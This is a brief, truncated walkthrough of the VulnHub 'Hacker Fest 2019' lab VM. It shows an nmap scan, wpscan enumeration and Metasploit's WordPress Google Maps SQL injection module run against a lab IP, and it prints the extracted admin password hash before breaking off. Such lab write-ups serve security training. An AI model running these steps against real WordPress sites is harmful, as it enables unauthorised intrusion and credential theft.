Vulnerable Machine Writeup * VULNHUB

HACKER FEST 2019 (VULNHUB)

Vulnhub Link: https://download.vulnhub.com/hackerfest/HF2019-Linux.ova root@kali:~# nmap -A 192.168.0.20 port : 21 , 22 , 80 , 10000 Enumeration : http://192.168.0.20 now on terminal root@kali:~# wpscan –url http://192.168.0.20/ WordPress Google maps Sqli Exploit : msf5 > use auxiliary/admin/http/wp google_maps_sqlimsf5 auxiliary(admin/http/wp_google_maps_sqli) > set rhosts 192.168.0.20msf5 auxiliary(admin/http/wp_google_maps_sqli) > exploit we get the output webmaster $P$Bsq0diLTcye6ASlofreys4GzRlRvSrl root@kali:~# gedit hash webmaster […]